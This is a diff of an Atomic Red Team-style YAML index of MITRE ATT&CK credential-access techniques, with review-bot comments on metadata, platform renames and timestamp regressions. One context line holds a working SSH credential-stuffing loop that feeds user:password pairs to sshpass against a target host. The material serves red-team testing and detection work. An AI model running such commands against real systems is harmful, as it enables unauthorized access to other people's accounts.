+ created: '2020-02-04T13:02:11.685Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/003
+ external_id: T1552.003
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.003
atomic_tests:
- name: Search Through Bash History
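Review bot: the bash-history detection string in this hunk's context is broken across lines at odd points (`.bash_history` / `is` / `read`, and `cat ~/.bash_history` / `.`), so the joined text reads "...~/.bash_history ." with a space before the period; as with the Chrome detection text earlier, normalize the source instead of carrying the artifact forward. The updated slideshare URL (`/slideshow/external-to-da-the-os-x-way/62021418`) with a retrieved date of September 12, 2024 is consistent with the other reference refreshes in this patch.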
@@ -55699,7 +56457,7 @@ credential-access:
name: sh
T1552.001:
technique:
- modified: '2024-04-15T21:33:00.213Z'
+ modified: '2024-10-15T14:28:43.639Z'
name: 'Unsecured Credentials: Credentials In Files'
description: |-
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -55773,7 +56531,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.001
atomic_tests:
- name: Find AWS credentials
@@ -55893,11 +56650,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1528:
technique:
- modified: '2024-03-24T19:41:54.832Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Application Access Token
description: "Adversaries can steal application access tokens as a means of
acquiring credentials to access remote systems and resources.\n\nApplication
@@ -55946,6 +56702,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Shailesh Tiwary (Indian Army)
@@ -55954,6 +56711,7 @@ credential-access:
- Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- Ram Pliskin, Microsoft Azure Security Center
- Jack Burns, HubSpot
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -55964,13 +56722,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- - Office 365
- - Azure AD
- - Google Workspace
- Containers
- x_mitre_version: '1.3'
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
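Review bot: T1528's platform list gains `IaaS` on top of the `Office Suite` / `Identity Provider` replacements, so this is a scope widening rather than a pure rename, which the 1.3 to 1.4 version bump reflects; make sure any IaaS-scoped index in this repo picks the technique up, since that is the concrete effect of the added line.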
@@ -56026,44 +56785,11 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1528
atomic_tests: []
T1552.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
- type: attack-pattern
- created: '2020-02-11T18:43:06.253Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.006
- url: https://attack.mitre.org/techniques/T1552/006
- - source_name: Microsoft GPP 2016
- url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
- description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
- March 9, 2020.
- - url: https://msdn.microsoft.com/library/cc422924.aspx
- description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
- 11, 2018.
- source_name: Microsoft GPP Key
- - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
- description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
- Retrieved April 11, 2018.
- source_name: Obscuresecurity Get-GPPPassword
- - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
- & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
- url: https://adsecurity.org/?p=2288
- source_name: ADSecurity Finding Passwords in SYSVOL
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-08-15T13:21:22.734Z'
name: 'Unsecured Credentials: Group Policy Preferences'
description: |
Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
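Review bot: same pattern as T1552.003 above: the T1552.006 header block (x_mitre_platforms, x_mitre_domains, object_marking_refs, id, type, created, external_references) is deleted here and re-added in the following hunk, so the large deletion is really a reorder. The external_references order also changes in the re-added block (Obscuresecurity Get-GPPPassword moves ahead of Microsoft GPP 2016); harmless for STIX consumers, but another sign the emitter has no stable ordering. At the top, the removal of `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` from T1528 is a move as well, since both were inserted after kill_chain_phases earlier in that object.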
@@ -56080,25 +56806,54 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
in SYSVOL)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+ created: '2020-02-11T18:43:06.253Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/006
+ external_id: T1552.006
+ - source_name: Obscuresecurity Get-GPPPassword
+ description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+ Retrieved April 11, 2018.
+ url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+ - source_name: Microsoft GPP 2016
+ description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+ March 9, 2020.
+ url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+ - source_name: Microsoft GPP Key
+ description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+ 11, 2018.
+ url: https://msdn.microsoft.com/library/cc422924.aspx
+ - source_name: ADSecurity Finding Passwords in SYSVOL
+ description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+ & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+ url: https://adsecurity.org/?p=2288
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.006
atomic_tests: []
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
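Review bot: T1556.008's `modified` goes from 2023-10-31 back to 2023-05-04 while its `x_mitre_attack_spec_version` stays at 3.1.0 in the next hunk; this is the third backwards timestamp in the patch (after T1557.001 and T1558.001), which points at a stale source bundle for a subset of objects rather than a one-off.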
@@ -56173,11 +56928,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1606:
technique:
- modified: '2023-10-15T11:10:03.428Z'
+ modified: '2024-10-15T15:58:23.638Z'
name: Forge Web Credentials
description: "Adversaries may forge credential materials that can be used to
gain access to web applications or Internet services. Web applications and
@@ -56221,11 +56975,10 @@ credential-access:
- Windows
- macOS
- Linux
- - Azure AD
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
@@ -56249,8 +57002,8 @@ credential-access:
url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
- source_name: GitHub AWS-ADFS-Credential-Generator
description: Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator.
- Retrieved December 16, 2020.
- url: https://github.com/damianh/aws-adfs-credential-generator
+ Retrieved September 27, 2024.
+ url: https://github.com/pvanbuijtene/aws-adfs-credential-generator
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
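Review bot: the AWS-ADFS-Credential-Generator reference changes repository owner (github.com/damianh to github.com/pvanbuijtene) while the description still credits Damian Hickey, January 28, 2017; confirm the new location is a fork or mirror of the cited project and not a different codebase, and consider a web.archive.org snapshot as was done for the other dead links in this patch so the citation does not break again when that repository moves.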
@@ -56266,11 +57019,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1621:
technique:
- modified: '2024-04-19T04:26:29.365Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication Request Generation
description: |-
Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.
@@ -56281,11 +57033,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
- Pawel Partyka, Microsoft 365 Defender
- Shanief Webb
- Obsidian Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor user account logs as well as 2FA/MFA application
logs for suspicious events: unusual login attempt source location, mismatch
@@ -56295,16 +57049,16 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- IaaS
- SaaS
- - Azure AD
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -56342,13 +57096,10 @@ credential-access:
url: https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.008:
technique:
- modified: '2023-04-11T00:34:00.779Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Chat Messages
description: |-
Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.
@@ -56357,6 +57108,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Douglas Weir
x_mitre_deprecated: false
@@ -56364,11 +57116,11 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -56386,13 +57138,10 @@ credential-access:
url: https://www.nightfall.ai/blog/saas-slack-security-risks-2020
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1212:
technique:
- modified: '2023-10-15T11:45:21.555Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Exploitation for Credential Access
description: |-
Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.
@@ -56405,6 +57154,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
- Mohit Rathore
@@ -56418,12 +57168,13 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- Windows
- macOS
- - Azure AD
- x_mitre_version: '1.5'
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Process: Process Creation'
@@ -56455,17 +57206,14 @@ credential-access:
url: https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/
- source_name: Microsoft Midnight Blizzard Replay Attack
description: Microsoft Threat Intelligence. (2023, June 21). Credential Attacks.
- Retrieved September 27, 2023.
- url: https://twitter.com/MsftSecIntel/status/1671579359994343425
+ Retrieved September 12, 2024.
+ url: https://x.com/MsftSecIntel/status/1671579359994343425
- source_name: Technet MS14-068
description: Microsoft. (2014, November 18). Vulnerability in Kerberos Could
Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.
url: https://technet.microsoft.com/en-us/library/security/ms14-068.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
@@ -56538,12 +57286,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests: []
T1110:
technique:
- modified: '2024-01-29T18:53:26.593Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Brute Force
description: |-
Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.(Citation: TrendMicro Pawn Storm Dec 2020) Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism.(Citation: Dragos Crashoverride 2018) Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
@@ -56552,6 +57299,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- David Fiser, @anu4is, Trend Micro
- Alfredo Oliveira, Trend Micro
@@ -56570,18 +57318,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Command: Command Execution'
@@ -56605,13 +57353,10 @@ credential-access:
url: https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.004:
technique:
- modified: '2024-03-07T14:28:02.910Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Credential Stuffing'
description: |-
Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.
@@ -56637,6 +57382,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Diogo Fernandes
- Anastasios Pingios
@@ -56648,18 +57394,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'User Account: User Account Authentication'
@@ -56678,9 +57424,6 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.004
atomic_tests:
- name: SSH Credential Stuffing From Linux
@@ -56749,7 +57492,7 @@ credential-access:
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -56778,24 +57521,26 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -56830,13 +57575,10 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1187:
technique:
- modified: '2023-08-14T19:30:45.123Z'
+ modified: '2024-10-15T16:33:34.508Z'
name: Forced Authentication
description: |-
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
@@ -56914,14 +57656,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Server_Message_Block
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1187
atomic_tests: []
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -56937,6 +57678,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -56945,13 +57687,13 @@ credential-access:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -56959,15 +57701,11 @@ credential-access:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
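Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM, root, User) is deleted from T1056 with no replacement, and the same field is dropped from T1003.008, T1556.001 and T1556.005 later in the patch. The removal is consistent with the spec bump to 3.2.0 that follows, but any tooling that filters or ranks atomics by required privilege loses that signal; this deserves an explicit mention in the changelog rather than being buried in a key-reorder diff.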
@@ -56978,9 +57716,8 @@ credential-access:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
@@ -57026,7 +57763,7 @@ credential-access:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
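Review bot: the `modified` timestamp for T1557.002 moves backwards, from '2022-11-08T14:00:00.188Z' to '2022-07-22T18:37:22.176Z', and `x_mitre_attack_spec_version` stays at 2.1.0 while the surrounding techniques are bumped to 3.2.0 with 2024 timestamps. That pattern suggests this object was regenerated from an older STIX bundle than the rest of the patch; check the source before merging, because a regressed `modified` value will make any freshness comparison against upstream ATT&CK pick the wrong version of the object.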
@@ -57045,17 +57782,16 @@ credential-access:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -57088,10 +57824,9 @@ credential-access:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
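Review bot: `SaaS` is removed from the T1556.009 platform list rather than mapped to a new name, which makes this the only hunk in the patch where a platform is dropped without a replacement (elsewhere Azure AD, Office 365 and Google Workspace are substituted and the remaining entries kept). The description's examples (Entra ID, Okta, JumpCloud) all fall under the new `Identity Provider` entry, so the change is plausible, but confirm it matches upstream ATT&CK and is not a side effect of the rename script.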
@@ -57128,11 +57863,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.006:
technique:
- modified: '2023-09-30T20:24:19.357Z'
+ modified: '2024-10-15T14:20:16.722Z'
name: Cloud Secrets Management Stores
description: "Adversaries may acquire credentials from cloud-native secret management
solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault,
@@ -57200,34 +57934,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.008:
technique:
- x_mitre_platforms:
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4
- type: attack-pattern
- created: '2020-02-11T18:46:56.263Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - url: https://attack.mitre.org/techniques/T1003/008
- external_id: T1003.008
- source_name: mitre-attack
- - description: The Linux Documentation Project. (n.d.). Linux Password and Shadow
- File Formats. Retrieved February 19, 2020.
- url: https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html
- source_name: Linux Password and Shadow File Formats
- - description: 'Vivek Gite. (2014, September 17). Linux Password Cracking: Explain
- unshadow and john Commands (John the Ripper Tool). Retrieved February 19,
- 2020.'
- url: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
- source_name: nixCraft - John the Ripper
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-25T20:48:04.491Z'
name: 'OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow'
description: |
Adversaries may attempt to dump the contents of /etc/passwd
and /etc/shadow
to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd
and /etc/shadow
